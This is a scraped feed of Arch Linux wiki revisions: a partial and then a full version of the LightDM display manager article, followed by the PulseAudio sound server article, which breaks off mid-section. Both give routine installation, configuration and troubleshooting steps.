Edit the LightDM configuration file and change these lines to:<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
autologin-user=''USERNAME''<br />
autologin-user-timeout=0<br />
}}<br />
or execute:<br />
<br />
# /usr/lib/lightdm/lightdm/lightdm-set-defaults --autologin=''USERNAME''<br />
<br />
LightDM goes through PAM even when {{ic|autologin}} is enabled. You must be part of the {{ic|autologin}} group to be able to login without entering your password:<br />
<br />
# groupadd autologin<br />
# gpasswd -a ''USERNAME'' autologin<br />
<br />
{{Note|GNOME users, and by extension any gnome-keyring user will have to set up a blank password to their keyring for it to be unlocked automatically.}}<br />
<br />
=== Hiding system and services users ===<br />
To prevent system users from showing-up in the login, install the optional dependency {{Pkg|accountsservice}}, or add the user names to {{ic|/etc/lightdm/users.conf}} under {{ic|hidden-users}}. The first option has the advantage of not needing to update the list when more users are added or removed.<br />
<br />
=== Migrating from SLiM ===<br />
Move the contents of [[xinitrc]] to [[xprofile]], removing the call to start the [[window manager]] or [[desktop environment]].<br />
<br />
=== NumLock ON ===<br />
Install the {{Pkg|numlockx}} package and the edit {{ic|/etc/lightdm/lightdm.conf}} adding the following line:<br />
greeter-setup-script=/usr/bin/numlockx on<br />
<br />
=== User switching ===<br />
LightDM supports user switching under a number of different desktop environments. To enable user switching it is necessary to create a symlink:<br />
# ln -s /usr/lib/lightdm/lightdm/gdmflexiserver /usr/local/bin/gdmflexiserver<br />
<br />
For an alternative method see the [[XScreenSaver#Lightdm]] article.<br />
<br />
=== Default Session ===<br />
<br />
Lightdm, like other DMs, stores the last-selected xsession in {{ic|~/.dmrc}}. See [[Display manager#Session_list]] for more info.<br />
<br />
== Troubleshooting ==<br />
If you encounter consistent screen flashing and ultimately no lightdm on boot, ensure that you have defined the greeter correctly in lightdm's config file. And if you have correctly defined the GTK greeter, make sure the {{ic|xsessions-directory}} (default: {{ic|/usr/share/xsessions}}) exists and contains at least one .desktop file.<br />
<br />
The same error can happen on lightdm startup if the last used session is not available anymore (eg. you last used gnome and then removed the gnome-session package): the easiest workaround is to temporarily restore the removed package. Another solution might be:<br />
# dbus-send --system --type=method_call --print-reply --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetXSession string:xfce<br />
This example sets the session "xfce" as default for the user 1000.<br />
<br />
=== Power menu (restart, poweroff etc.) not available ===<br />
If you have installed lightdm before lightdm-1:1.6.0-6, you might have been struck by this bug: {{Bug|36613}}, to fix it run:<br />
# chown polkitd:root /usr/share/polkit-1/rules.d<br />
<br />
=== Wrong locale displayed ===<br />
In case of your locale not being displayed correctly in Lightdm add your locale to {{ic|/etc/environment}}<br />
LANG=pt_PT.utf8<br />
<br />
=== Xresources not being parsed correctly ===<br />
LightDM has an upstream bug where your [[Xresources]] file will not be loaded with a pre-processor. In practical terms, this means that variables set with {{ic|#define}} are not expanded when called later. You may see this reflected as an all-pink screen if using a custom color set with urxvt. To fix it, edit {{ic|/etc/lightdm/Xsession}} and search for the line:<br />
xrdb -nocpp -merge "$file"<br />
Change it to read:<br />
xrdb -merge "$file"<br />
Your Xresources will now be pre-processed so that variables are correctly expanded.<br />
<br />
=== Missing icons with GTK greeter ===<br />
If you're using {{Pkg|lightdm-gtk2-greeter}} as a greeter and it shows placeholder images as icons, make sure valids icon theme and theme are configured. Check the following file:<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|<br />
[greeter]<br />
theme-name&#61;mate # this should be the name of a directory under /usr/share/themes/<br />
icon-theme-name&#61;mate # this should be the name of a fully featured icons set directory under /usr/share/icons/<br />
}}<br />
<br />
== See Also ==<br />
* [https://wiki.ubuntu.com/LightDM Ubuntu Wiki article]<br />
* [http://wiki.gentoo.org/wiki/LightDM Gentoo Wiki article]<br />
* [https://launchpad.net/lightdm Launchpad Page]<br />
* [http://www.mattfischer.com/blog/?tag=lightdm LightDM blog]</div>Wakehttps://wiki.archlinux.org/index.php?title=LightDM&diff=306739LightDM2014-03-23T16:23:33Z<p>Wake: /* The AccountsService way */ Clarify the actual filenames, use png file extension.</p>
<hr />
<div>[[Category:Display managers]]<br />
[[es:LightDM]]<br />
[[fr:LightDM]]<br />
[[ja:LightDM]]<br />
[[zh-CN:LightDM]]<br />
{{Related articles start}}<br />
{{Related|Display manager}}<br />
{{Related|GDM}}<br />
{{Related|KDM}}<br />
{{Related|LXDM}}<br />
{{Related articles end}}<br />
<br />
[http://www.freedesktop.org/wiki/Software/LightDM LightDM] is a cross-desktop [[display manager]] that aims to be the standard display manager for the X server. Its key features are:<br />
* A lightweight codebase<br />
* Standards compliant (PAM, logind, etc)<br />
* A well defined interface between the server and the user interface.<br />
* Cross-desktop (user interfaces can be written in any toolkit).<br />
<br />
More details about LightDM's design can be found [http://www.freedesktop.org/wiki/Software/LightDM/Design here].<br />
<br />
== Installation ==<br />
Install {{Pkg|lightdm}} from the [[official repositories]]. You can also install {{AUR|lightdm-devel}} for the development branch or {{AUR|lightdm-bzr}} from the [[AUR]].<br />
<br />
=== Greeter===<br />
You will also need to install a greeter (a user interface for LightDM). The reference greeter is ''lightdm-gtk-greeter'', which is provided by {{Pkg|lightdm-gtk2-greeter}} or {{Pkg|lightdm-gtk3-greeter}}. KDE users can install {{Pkg|lightdm-kde-greeter}}, a greeter based on Qt.<br />
<br />
Other greeters can be installed from the [[AUR]] as well: <br />
* {{AUR|lightdm-another-gtk-greeter}}: A GTK3 greeter with custom theme support<br />
* {{AUR|lightdm-webkit-greeter}}: A greeter that uses Webkit for theming.<br />
* {{AUR|lightdm-crowd-greeter}}: A 3D greeter that lets you select your profile from 3D characters walking around.<br />
* {{AUR|lightdm-unity-greeter}}: The greeter used by Ubuntu's [[Unity]].<br />
* {{AUR|lightdm-razor-greeter}}: A greeter for the [[Razor-qt]] desktop environment.<br />
* {{AUR|lightdm-pantheon-greeter}}: A greeter from the ElementaryOS Project.<br />
<br />
You can change the default greeter by changing the configuration file to state:<br />
{{hc|/etc/lightdm/lightdm.conf|<br />
greeter-session&#61;lightdm-yourgreeter-greeter<br />
}}<br />
<br />
== Enabling LightDM ==<br />
Make sure to enable the {{ic|lightdm}} daemon using [[systemd#Using units|systemctl]] so it will be started at boot.<br />
<br />
== Command line tool ==<br />
LightDM offers a command line tool, {{ic|dm-tool}}, which can be used to lock the current seat, switch sessions, etc, which is useful with 'minimalist' window managers and for testing. To see a list of available commands, execute:<br />
$ dm-tool --help<br />
<br />
== Testing ==<br />
First, [[Pacman|install]] {{Pkg|xorg-server-xephyr}} from the [[official repositories]].<br />
<br />
Then, run LightDM as an X application:<br />
$ lightdm --test-mode --debug<br />
<br />
== Optional configuration and Tweaks ==<br />
Some greeters have their own configuration files. For example, {{Pkg|lightdm-gtk2-greeter}} and {{Pkg|lightdm-gtk3-greeter}} have:<br />
/etc/lightdm/lightdm-gtk-greeter.conf<br />
and {{Pkg|lightdm-kde-greeter}} has:<br />
/etc/lightdm/lightdm-kde-greeter.conf<br />
as well as a section in KDE's System Settings (recommended).<br />
<br />
LightDM can be configured by directly modifying its configuration script or by using the {{ic|lightdm-set-defaults}} applications<br />
that can be found in {{ic|/usr/lib/lightdm/lightdm/}}. To see some of the options available, execute:<br />
$ man lightdm-set-defaults<br />
<br />
There are, however, a lot more variables to modify in the configuration file than by using the {{ic|lightdm-set-defaults}} application.<br />
<br />
=== Changing Background Images/Colors ===<br />
Users wishing to have a flat color (no image) may simply set the '''background''' variable to a hex color.<br />
<br />
Example:<br />
background=#000000<br />
<br />
If you want to use an image instead, see below.<br />
<br />
==== GTK+ Greeter ====<br />
Users wishing to customize the wallpaper on the greeter screen need to edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} defining the '''background''' variable.<br />
<br />
Example:<br />
background=/usr/share/pixmaps/black_and_white_photography-wallpaper-1920x1080.jpg<br />
<br />
==== Unity Greeter ====<br />
Users using the {{AUR|lightdm-unity-greeter}} must edit the {{ic|/usr/share/glib-2.0/schemas/com.canonical.unity-greeter.gschema.xml}} file and then execute:<br />
# glib-compile-schemas /usr/share/glib-2.0/schemas/<br />
<br />
According to [https://bbs.archlinux.org/viewtopic.php?id=149945 this] page.<br />
<br />
{{Note|It is recommended to place the PNG or JPG file in {{ic|/usr/share/pixmaps}} since the LightDM user needs read access to the wallpaper file.}}<br />
<br />
==== KDE Greeter ====<br />
Go to ''System Settings > Login Screen (LightDM)'' and change the background image for your theme.<br />
<br />
=== Changing your avatar ===<br />
<br />
==== The .face way ====<br />
Users wishing to customize their image on the greeter screen need to place an PNG image called {{ic|.face}} or {{ic|.face.icon}} in their home directory. Make sure it can be read by LightDM.<br />
<br />
{{Note|As of December 2013, some people have issues where the icon file does not get picked up. The preferred way is to install accountsservice and use the following AccountsService way.}}<br />
<br />
==== The AccountsService way ====<br />
The .face way is known to cause issues, fortunately LightDM is able to use AccountsService automatically. First make sure the {{pkg|accountsservice}} package ([[official repositories]]) is installed, then set it up as follows, replacing <username> with the desired user's login name. The use of the .png file extension is presumably optional.<br />
<br />
* Edit or create the file {{ic|/var/lib/AccountsService/users/<username>}}, and add the line[s]<br />
<br />
[User]<br />
Icon=/var/lib/AccountsService/icons/<username>.png<br />
<br />
* Create the file {{ic|/var/lib/AccountsService/icons/<username>.png}} using a 96x96 PNG icon file.<br />
<br />
==== Sources of Arch-centric 64x64 Icons ====<br />
The {{AUR|archlinux-artwork}} package from the [[AUR]] contains some nice examples that install to {{ic|/usr/share/archlinux/icons}} and that can be copied to {{ic|/usr/share/icons/hicolor/64x64/devices}} as follows:<br />
# find /usr/share/archlinux/icons -name "*64*" -exec cp {} /usr/share/icons/hicolor/64x64/devices \;<br />
<br />
After copying, the {{AUR|archlinux-artwork}} package can be removed.<br />
<br />
=== Enabling Autologin ===<br />
Edit the LightDM configuration file and change these lines to:<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
autologin-user=''USERNAME''<br />
autologin-user-timeout=0<br />
}}<br />
or execute:<br />
<br />
# /usr/lib/lightdm/lightdm/lightdm-set-defaults --autologin=''USERNAME''<br />
<br />
LightDM goes through PAM even when {{ic|autologin}} is enabled. You must be part of the {{ic|autologin}} group to be able to login without entering your password:<br />
<br />
# groupadd autologin<br />
# gpasswd -a ''USERNAME'' autologin<br />
<br />
{{Note|GNOME users, and by extension any gnome-keyring user will have to set up a blank password to their keyring for it to be unlocked automatically.}}<br />
<br />
=== Hiding system and services users ===<br />
To prevent system users from showing-up in the login, install the optional dependency {{Pkg|accountsservice}}, or add the user names to {{ic|/etc/lightdm/users.conf}} under {{ic|hidden-users}}. The first option has the advantage of not needing to update the list when more users are added or removed.<br />
<br />
=== Migrating from SLiM ===<br />
Move the contents of [[xinitrc]] to [[xprofile]], removing the call to start the [[window manager]] or [[desktop environment]].<br />
<br />
=== NumLock ON ===<br />
Install the {{Pkg|numlockx}} package and the edit {{ic|/etc/lightdm/lightdm.conf}} adding the following line:<br />
greeter-setup-script=/usr/bin/numlockx on<br />
<br />
=== User switching ===<br />
LightDM supports user switching under a number of different desktop environments. To enable user switching it is necessary to create a symlink:<br />
# ln -s /usr/lib/lightdm/lightdm/gdmflexiserver /usr/local/bin/gdmflexiserver<br />
<br />
For an alternative method see the [[XScreenSaver#Lightdm]] article.<br />
<br />
=== Default Session ===<br />
<br />
Lightdm, like other DMs, stores the last-selected xsession in {{ic|~/.dmrc}}. See [[Display manager#Session_list]] for more info.<br />
<br />
== Troubleshooting ==<br />
If you encounter consistent screen flashing and ultimately no lightdm on boot, ensure that you have defined the greeter correctly in lightdm's config file. And if you have correctly defined the GTK greeter, make sure the {{ic|xsessions-directory}} (default: {{ic|/usr/share/xsessions}}) exists and contains at least one .desktop file.<br />
<br />
The same error can happen on lightdm startup if the last used session is not available anymore (eg. you last used gnome and then removed the gnome-session package): the easiest workaround is to temporarily restore the removed package. Another solution might be:<br />
# dbus-send --system --type=method_call --print-reply --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetXSession string:xfce<br />
This example sets the session "xfce" as default for the user 1000.<br />
<br />
=== Power menu (restart, poweroff etc.) not available ===<br />
If you have installed lightdm before lightdm-1:1.6.0-6, you might have been struck by this bug: {{Bug|36613}}, to fix it run:<br />
# chown polkitd:root /usr/share/polkit-1/rules.d<br />
<br />
=== Wrong locale displayed ===<br />
In case of your locale not being displayed correctly in Lightdm add your locale to {{ic|/etc/environment}}<br />
LANG=pt_PT.utf8<br />
<br />
=== Xresources not being parsed correctly ===<br />
LightDM has an upstream bug where your [[Xresources]] file will not be loaded with a pre-processor. In practical terms, this means that variables set with {{ic|#define}} are not expanded when called later. You may see this reflected as an all-pink screen if using a custom color set with urxvt. To fix it, edit {{ic|/etc/lightdm/Xsession}} and search for the line:<br />
xrdb -nocpp -merge "$file"<br />
Change it to read:<br />
xrdb -merge "$file"<br />
Your Xresources will now be pre-processed so that variables are correctly expanded.<br />
<br />
=== Missing icons with GTK greeter ===<br />
If you're using {{Pkg|lightdm-gtk2-greeter}} as a greeter and it shows placeholder images as icons, make sure valids icon theme and theme are configured. Check the following file:<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|<br />
[greeter]<br />
theme-name&#61;mate # this should be the name of a directory under /usr/share/themes/<br />
icon-theme-name&#61;mate # this should be the name of a fully featured icons set directory under /usr/share/icons/<br />
}}<br />
<br />
== See Also ==<br />
* [https://wiki.ubuntu.com/LightDM Ubuntu Wiki article]<br />
* [http://wiki.gentoo.org/wiki/LightDM Gentoo Wiki article]<br />
* [https://launchpad.net/lightdm Launchpad Page]<br />
* [http://www.mattfischer.com/blog/?tag=lightdm LightDM blog]</div>Wakehttps://wiki.archlinux.org/index.php?title=PulseAudio&diff=291815PulseAudio2014-01-06T19:05:29Z<p>Wake: /* Installation */ ponymix is now a community pkg.</p>
<hr />
<div>[[Category:Audio/Video]]<br />
[[Category:Sound]]<br />
[[cs:PulseAudio]]<br />
[[es:PulseAudio]]<br />
[[fr:PulseAudio]]<br />
[[it:PulseAudio]]<br />
[[pt:PulseAudio]]<br />
[[ru:PulseAudio]]<br />
[[tr:PulseAudio]]<br />
{{Related articles start}}<br />
{{Related|PulseAudio/Examples}}<br />
{{Related articles end}}<br />
[[Wikipedia:PulseAudio|PulseAudio]] is a sound server commonly used by desktop environments like [[GNOME]] or [[KDE]]. It serves as a proxy to sound applications using existing kernel sound components like [[ALSA]] or [[OSS]]. Since [[ALSA]] is included in Arch Linux by default, the most common deployment scenarios include PulseAudio with [[ALSA]].<br />
<br />
== Installation ==<br />
<br />
* Required package: {{Pkg|pulseaudio}}<br />
* Optional GTK GUIs: {{Pkg|paprefs}} and {{Pkg|pavucontrol}}<br />
* Optional volume control via mapped keyboard keys: {{AUR|pulseaudio-ctl}}<br />
* Optional console (CLI) mixers: {{Pkg|ponymix}} and {{AUR|pamixer-git}}<br />
* Optional system tray icon: {{AUR|pasystray-git}}<br />
* Optional KDE plasma applet: {{Pkg|kdemultimedia-kmix}} and {{AUR|kdeplasma-applets-veromix}}<br />
<br />
== Running ==<br />
{{Warning|If you have per-user copies of configuration files (such as {{ic|client.conf}}, {{ic|daemon.conf}} or {{ic|default.pa}}) in {{ic|~/.config/pulse/}} or {{ic|~/.pulse/}}, make sure you keep them in sync with changes to the packaged files in {{ic|/etc/pulse/}}. Otherwise, PulseAudio may refuse to start due to configuration errors.}}<br />
<br />
{{Note|<br />
* Pulseaudio requires [[D-Bus]] to function.<br />
* Most X11 environments start pulseaudio automatically with the X11 session.<br />
}}<br />
<br />
In the unlikely event that pulseaudio is not automatically called upon entering X, it can can be started with:<br />
$ pulseaudio --start<br />
<br />
PulseAudio can be stopped with:<br />
$ pulseaudio -k<br />
<br />
== Equalizer ==<br />
<br />
Newer pulseaudio versions have an intergrated 10-band equalizer system. In order to use the equalizer do the following:<br />
<br />
=== Load equalizer sink and dbus-protocol module ===<br />
<br />
$ pactl load-module module-equalizer-sink<br />
$ pactl load-module module-dbus-protocol<br />
<br />
=== Install and run the gui frontend ===<br />
<br />
Install {{Pkg|python-pyqt4}} and execute:<br />
<br />
$ qpaeq<br />
<br />
{{Note|If qpaeq has no effect, install {{pkg|pavucontrol}} and change "ALSA Playback on" to "FFT based equalizer on ..." while the media player is running.}}<br />
<br />
=== Load equalizer and dbus module on every boot ===<br />
<br />
Edit the file {{ic|/etc/pulse/default.pa}} with your favorite editor and append the following lines:<br />
<br />
### Load the integrated pulseaudio equalizer and dbus module<br />
load-module module-equalizer-sink<br />
load-module module-dbus-protocol<br />
<br />
== Backend Configuration ==<br />
<br />
=== ALSA ===<br />
<br />
* Recommended package: {{Pkg|pulseaudio-alsa}}<br />
* Optional packages: {{Pkg|lib32-libpulse}} and {{Pkg|lib32-alsa-plugins}}<br />
<br />
{{Note|Optional packages are needed only if running x86_64 and wanting to have sound for 32 bit programs (like Wine).}}<br />
<br />
For the applications that do not support PulseAudio and support ALSA it is '''recommended''' to install the PulseAudio plugin for ALSA. This package also contains the necessary {{ic|/etc/asound.conf}} for configuring ALSA to use PulseAudio.<br />
<br />
To prevent applications from using ALSA's OSS emulation and bypassing Pulseaudio (thereby preventing other applications from playing sound), make sure the module {{ic|snd_pcm_oss}} is not being loaded at boot. If it is currently loaded (<code>lsmod|grep oss</code>), disable it by executing:<br />
# rmmod snd_pcm_oss<br />
<br />
=== ALSA/dmix without grabbing hardware device ===<br />
<br />
{{Note|This section describes alternative configuration, which is generally '''not''' recommended.}}<br />
<br />
You may want to use ALSA directly in most of your applications and to be able to use other applications, which constantly require PulseAudio at the same time. The following steps allow you to make PulseAudio use dmix instead of grabbing ALSA hardware device.<br />
<br />
* Remove package {{Pkg|pulseaudio-alsa}}, which provides compatibility layer between ALSA applications and PulseAudio. After this your ALSA apps will use ALSA directly without being hooked by Pulse.<br />
<br />
* Edit {{ic|/etc/pulse/default.pa}}.<br />
:Find and uncomment lines which load backend drivers. Add '''device''' parameters as follows. Then find and comment lines which load autodetect modules.<br />
load-module module-alsa-sink '''device=dmix'''<br />
load-module module-alsa-source '''device=dsnoop'''<br />
# load-module module-udev-detect<br />
# load-module module-detect<br />
<br />
* ''Optional:'' If you use {{Pkg|kdemultimedia-kmix}} you may want to control ALSA volume instead of PulseAudio volume:<br />
$ echo export KMIX_PULSEAUDIO_DISABLE=1 > ~/.kde4/env/kmix_disable_pulse.sh<br />
$ chmod +x ~/.kde4/env/kmix_disable_pulse.sh<br />
<br />
* Now, reboot your computer and try running alsa and pulseaudio applications at the same time. They both should produce sound simultaneously.<br />
:Use {{Pkg|pavucontrol}} to control PulseAudio volume if needed.<br />
<br />
=== OSS ===<br />
<br />
There are multiple ways of making OSS-only programs play to PulseAudio:<br />
<br />
==== ossp ====<br />
<br />
Install {{Pkg|ossp}} package and start '''ossp''' service.<br />
<br />
==== padsp wrapper (part of PulseAudio) ====<br />
<br />
Programs using OSS can work with PulseAudio by starting it with padsp:<br />
<br />
$ padsp OSSprogram<br />
A few examples:<br />
$ padsp aumix<br />
$ padsp sox foo.wav -t ossdsp /dev/dsp<br />
<br />
You can also add a custom wrapper script like this: <br />
{{hc|/usr/local/bin/OSSProgram|<nowiki><br />
#!/bin/sh<br />
exec padsp /usr/bin/OSSprogram "$@"<br />
</nowiki>}}<br />
Make sure {{ic|/usr/local/bin}} comes before {{ic|/usr/bin}} in your '''PATH'''.<br />
<br />
=== GStreamer ===<br />
<br />
To make [[GStreamer]] use PulseAudio, you need to install {{Pkg|gst-plugins-good}} or {{Pkg|gstreamer0.10-good-plugins}}.<br />
<br />
=== OpenAL ===<br />
<br />
OpenAL Soft should use PulseAudio by default, but can be explicitly configured to do so: {{hc|/etc/openal/alsoft.conf|2=drivers=pulse,alsa}}<br />
<br />
=== libao ===<br />
<br />
Edit the libao configuration file:<br />
{{hc|# /etc/libao.conf|2=default_driver=pulse}}<br />
Be sure to remove the {{ic|1=dev=default}} option of the alsa driver or adjust it to specify a specific Pulse sink name or number. <br />
<br />
{{Note|You could possibly also keep the libao standard of outputting to the ''alsa'' driver and its default device if you install {{pkg|pulseaudio-alsa}} since the ALSA default device then '''is''' PulseAudio.}}<br />
<br />
=== ESD ===<br />
<br />
PulseAudio is a drop-in replacement for the enlightened sound daemon (ESD). While PulseAudio is running, ESD clients should be able to output to it without configuration.<br />
<br />
== Desktop environments ==<br />
<br />
=== General X11 ===<br />
<br />
{{Note|As mentioned previously, PulseAudio is very likely launched automatically via either {{ic|/etc/X11/xinit/xinitrc.d/pulseaudio}} or the files in {{ic|/etc/xdg/autostart/}} if users have some DE installed.}}<br />
<br />
Check to see if PulseAudio is running:<br />
<br />
{{hc|<nowiki>$ ps aux | grep pulse</nowiki>|<br />
facade 1794 0.0 0.0 360464 6532 ? S<l 15:33 0:00 /usr/bin/pulseaudio --start<br />
facade 1827 0.0 0.0 68888 2608 ? S 15:33 0:00 /usr/lib/pulse/gconf-helper<br />
}}<br />
<br />
If Pulseaudio is not running and users are using X, the following will start PulseAudio with the needed the X11 plugins manually:<br />
$ start-pulseaudio-x11<br />
<br />
If you are not running Gnome, KDE or XFCE and your {{ic|~/.xinitrc}} does not source the scripts in {{ic|/etc/X11/xinit/xinitrc.d}} (such as is done in the example file {{ic|/etc/skel/.xinitrc}}) then you can launch PulseAudio on boot with:<br />
{{hc|~/.xinitrc|<br />
/usr/bin/start-pulseaudio-x11<br />
}}<br />
<br />
=== GNOME ===<br />
<br />
As of GNOME 3, GNOME fully integrates with PulseAudio and no extra configuration is needed.<br />
<br />
=== KDE 3 ===<br />
<br />
PulseAudio is ''not'' a drop-in replacement for aRts. Users of KDE 3 cannot use PulseAudio. However note, recent versions of PulseAudio may have eliminated the prohibition:<br />
<br />
See: http://www.pulseaudio.org/wiki/PerfectSetup KDE 3 uses the artsd sound server by default. However, artsd itself can be configured to use an Esound backend. Edit {{ic|kcmartsrc}} (either in {{ic|/etc/kde}} or {{ic|/usr/share/config}} for global configuration or {{ic|.kde/share/config}} to configure only one user) like this:<br />
<br />
[Arts]<br />
Arguments=\s-F 10 -S 4096 -a esd -n -s 1 -m artsmessage -c drkonqi -l 3 -f<br />
NetworkTransparent=true<br />
SuspendTime=1<br />
<br />
=== KDE Plasma Workspaces and Qt4 ===<br />
<br />
PulseAudio, it will be used by KDE/Qt4 applications. For more information see the [http://www.pulseaudio.org/wiki/KDE KDE page in the PulseAudio wiki].<br />
<br />
PulseAudio support has been merged into KMix, the default KDE sound mixer.<br />
<br />
If the phonon-gstreamer backend is used for Phonon, GStreamer should also be [[PulseAudio#GStreamer|configured]] to use PulseAudio by installing {{Pkg|gstreamer0.10-good-plugins}}.<br />
<br />
One useful tidbit from that page is to add {{ic|load-module module-device-manager}} to {{ic|/etc/pulse/default.pa}}.<br />
<br />
Additionally, the {{AUR|kdeplasma-applets-veromix}} is available in the [[AUR]] as a KDE alternative to KMix or pavucontrol.<br />
<br />
If KMix/Veromix fail to connect to PulseAudio at boot you may need to edit {{ic|/etc/pulse/client.conf}} to include {{ic|autospawn &#61; yes}} instead of {{ic|autospawn &#61; no}}.<br />
<br />
=== Xfce ===<br />
<br />
Applications running under Xfce can take advantage of PulseAudio. To manage PulseAudio settings you can use {{Pkg|pavucontrol}}.<br />
<br />
== Applications ==<br />
<br />
=== Audacious ===<br />
<br />
[[Audacious]] natively supports PulseAudio. In order to use it, set Audacious Preferences -> Audio -> Current output plugin to 'PulseAudio Output Plugin'.<br />
<br />
=== Java/OpenJDK 6 ===<br />
<br />
Create a wrapper for the java executable using padsp as seen on the [[Java#Java_sound_with_Pulseaudio|Java sound with Pulseaudio]] page.<br />
<br />
=== Music Player Daemon (MPD) ===<br />
<br />
[http://mpd.wikia.com/wiki/PulseAudio configure] [[MPD]] to use PulseAudio. See also [[MPD/Tips and Tricks#MPD and PulseAudio]].<br />
<br />
=== MPlayer ===<br />
<br />
[[MPlayer]] natively supports PulseAudio output with the "{{ic|-ao pulse}}" option. It can also be configured to default to PulseAudio output, in {{ic|~/.mplayer/config}} for per-user, or {{ic|/etc/mplayer/mplayer.conf}} for system-wide:<br />
{{hc|/etc/mplayer/mplayer.conf|2=ao=pulse}}<br />
<br />
=== Skype (x86_64 only) ===<br />
<br />
Install {{Pkg|lib32-libpulse}}, otherwise the following error will occur when trying to initiate a call: "Problem with Audio Playback".<br />
<br />
== Troubleshooting ==<br />
<br />
=== No sound after install ===<br />
<br />
==== Muted audio device ====<br />
<br />
If one experiences no audio output via any means while using ALSA, attempt to unmute the sound card. To do this, launch {{ic|alsamixer}} and make sure each column has a green 00 under it (this can be toggled by pressing {{ic|m}}):<br />
$ alsamixer -c 0<br />
<br />
{{Note|alsamixer will not tell you which output device is set as the default. One possible cause of no sound after install is that pulseaudio detects the wrong output device as a default. Install {{Pkg|pavucontrol}} and check if there is any output on the pavucontrol panel when playing a ''.wav'' file.}}<br />
<br />
==== Auto-Mute Mode ====<br />
<br />
Auto-Mute Mode may be enabled. It can be disabled using {{ic|alsamixer}}.<br />
<br />
See http://superuser.com/questions/431079/how-to-disable-auto-mute-mode for more.<br />
<br />
==== Bad configuration files ====<br />
<br />
If after starting pulseaudio, the system outputs no sound, it may be necessary to delete the contents of {{ic|~/.pulse}}. Pulseaudio will automatically create new configuration files on its next start.<br />
<br />
==== Flash content ====<br />
<br />
Since Adobe Flash does not directly support PulseAudio the recommended way is to [https://wiki.archlinux.org/index.php/PulseAudio#ALSA configure ALSA to use the virtual PulseAudio soundcard].<br />
<br />
Alternatively you may try out {{AUR|libflashsupport-pulse}} from the [[AUR]].<br />
{{Note|This may invariably crash the flash plugin.}}<br />
<br />
==== No cards ====<br />
<br />
If PulseAudio starts, run {{ic|pacmd list}}. If no cards are reported, make sure that the ALSA devices are not in use:<br />
$ fuser -v /dev/snd/*<br />
$ fuser -v /dev/dsp<br />
<br />
Make sure any applications using the pcm or dsp files are shut down before restarting PulseAudio.<br />
<br />
==== The only device shown is "dummy output" ====<br />
<br />
This may be caused by different reasons, one of them being the {{ic|.asoundrc}} file in $HOME is taking precedence over the systemwide {{ic|/etc/asound.conf}}.<br />
<br />
The user file is modified also by the tool {{ic|asoundconf}} or by its graphical variant {{ic|asoundconf-gtk}} (the latter is named "Default sound card" in the menu) as soon as it runs. Prevent the effects of {{ic|.asoundrc}} altogether by commenting the last line like this:<br />
{{hc|.asoundrc|<br />
# </home/''yourusername''/.asoundrc.asoundconf><br />
}}<br />
<br />
Maybe some program is monopolizing the audio device:<br />
{{hc|# fuser -v /dev/snd/*|<br />
USER PID ACCESS COMMAND<br />
/dev/snd/controlC0: root 931 F.... timidity<br />
bob 1195 F.... panel-6-mixer<br />
/dev/snd/controlC1: bob 1195 F.... panel-6-mixer<br />
bob 1215 F.... pulseaudio<br />
/dev/snd/pcmC0D0p: root 931 F...m timidity<br />
/dev/snd/seq: root 931 F.... timidity<br />
/dev/snd/timer: root 931 f.... timidity<br />
}}<br />
<br />
That means timidity blocks pulseaudio from accessing the audio devices. Just killing timidity will make the sound work again.<br />
<br />
Another reason is [[FluidSynth]] conclicting with pulseaudio as discussed in [https://bbs.archlinux.org/viewtopic.php?id=154002 this thread]. The solution is to remove FluidSynth:<br />
<br />
# pacman -Rnsc fluidsynth<br />
<br />
==== KDE4 ====<br />
<br />
It may be that another output device set as preferred in phonon. Make sure that every setting reflects the preferred output device at the top, and check the playback streams tab in {{ic|kmix}} to make sure that applications are using the device for output.<br />
<br />
To see your default audio device, you can run:<br />
<br />
pactl stat<br />
<br />
To see available audio devices:<br />
<br />
pactl list<br />
<br />
To set your default audio device use "pacmd" or add to /etc/pulse/default.pa:<br />
set-default-sink alsa_output.analog-stereo<br />
<br />
==== Failed to create sink input: sink is suspended ====<br />
<br />
If you do not have any output sound and receive dozens of errors related to a suspended sink in your {{ic|journalctl -b}} log, then backup first and then delete your user-specific pulse folders:<br />
<br />
$ rm -r ~/.pulse ~/.pulse-cookie<br />
<br />
=== No HDMI sound output after some time with the monitor turned off ===<br />
<br />
The monitor is connected via HDMI/DisplayPort, and the audio jack is plugged in the headphone jack of the monitor, but pulseaudio insists that it's unplugged:<br />
{{hc|pactl list sinks|<br />
...<br />
hdmi-output-0: HDMI / DisplayPort (priority: 5900, not available)<br />
...<br />
}}<br />
<br />
This leads to no sound coming from HDMI output. A workaround for this is to switch to another TTY and back again. This problem has been reported by ATI/Nvidia/Intel users.<br />
<br />
=== Can't update configuration of sound device in pavucontrol ===<br />
<br />
{{Pkg|pavucontrol}} is a handy GUI utility for configuring pulseaudio. Under its 'Configuration' tab, you can select different profiles for each of your sound devices e.g. analogue stereo, digital output (IEC958), HDMI 5.1 Surround etc.<br />
<br />
However, you may run into an instance where selecting a different profile for a card results in the pulse daemon crashing and auto restarting without the new selection "sticking". If this occurs, use the other useful GUI tool, {{Pkg|paprefs}}, to check under the "Simultaneous Output" tab for a virtual simultaneous device. If this setting is active (checked), it will prevent you changing any card's profile in pavucontrol. Uncheck this setting, then adjust your profile in pavucontrol prior to re-enabling simultaneous output in paprefs.<br />
<br />
=== Simultaneous output to multiple sound cards / devices ===<br />
<br />
Simultaneous output to two different devices can be very useful. For example, being able to send audio to your A/V receiver via your graphics card's HDMI output, while also sending the same audio through the analogue output of your motherboard's built-in audio. This is much less hassle than it used to be (in this example, we are using GNOME desktop).<br />
<br />
Using {{Pkg|paprefs}}, simply select "Add virtual output device for simultaneous output on all local sound cards" from under the "Simultaneous Output" tab. Then, under GNOME's "sound settings", select the simultaneous output you have just created.<br />
<br />
If this doesn't work, try adding the following to {{ic|~/.asoundrc}}:<br />
<br />
pcm.dsp {<br />
type plug<br />
slave.pcm "dmix"<br />
}<br />
<br />
=== Simultaneous output to multiple sinks on the same sound card not working===<br />
This can be useful for users who have multiple sound sources and want to play them on different sinks/outputs. <br />
